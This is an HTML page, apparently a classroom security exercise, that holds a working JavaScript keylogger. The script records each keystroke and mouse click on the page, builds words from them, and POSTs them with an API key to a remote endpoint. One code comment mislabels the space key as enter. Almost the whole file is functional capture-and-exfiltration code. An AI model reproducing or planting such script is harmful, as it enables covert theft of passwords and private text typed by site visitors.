<!DOCTYPE html>
<html>
<head>
<title>Page Title</title>
</head>
<body>

    <h1>Keylogger</h1>

    <textarea style="width: 100%; height: 100px;"></textarea>



<script>
    var word = "";
    document.addEventListener("keydown", function(event) {
        
        

        let characterCode = event.which || event.keyCode;


        // sends the word after every enter
        if(characterCode == 32){
            
            sendPayload("input before shift", word)

            word = "";
        }
        else{
            var characterValue = String.fromCharCode(characterCode);

            if (event.shiftKey) {
                characterValue = characterValue.toUpperCase();
            } else {
                characterValue = characterValue.toLowerCase();
            }

            switch(characterCode){
                case 8:
                    if(word.length > 0){
                        word = word.slice(0, -1); 
                    }
                    break;
                case 9:
                    word += "(TAB)"
                    break;
                case 16:
                    word += "(SHIFT)"
                    break;
                case 17: 
                    word += "(CTRL)"
                    break;
                case 18:
                    word += "(ALT)"
                    break;
                case 188:
                    word += ","
                    break;
                case 189:
                    word += "-"
                    break;
                case 190:
                    word += "."
                    break;
                case 222:
                    word += "ö"
                    break;
                case 186:
                    word += "ü"
                    break;
                case 220:
                    word += "ä"
                    break;
                default:
                    word += characterValue;
            }


            console.log(characterValue, characterCode, word);
        }
    });


    document.addEventListener("click", function(event){
		var click;

        var x = event.clientX;     // Get the horizontal coordinate
        var y = event.clientY;     // Get the vertical coordinate
        var coor = "X coords: " + x + ", Y coords: " + y;

		if(event.which == 1){
			click = "Left Click";
		}
        else{
			click = "Right Click";
		}
		
        sendPayload("click event", click + " | " + coor)
	});

    function sendPayload(keyword, payload){
        const data = {
            "keyword": keyword,
            "payload": payload
            };
            fetch('https://m183.gibz-informatik.ch/api/keylogger', {
                method: 'POST',
                headers: {
                'Content-Type': 'application/json',
                'X-Api-Key': 'MwA2ADEANQA1ADkANgAwADQAMQA4ADQAMgAzADQAOAAwADIA',
                },
                body: JSON.stringify(data),
            });

        console.log("data sent: ", data)
    }

    
        
    
</script>

</body>
</html>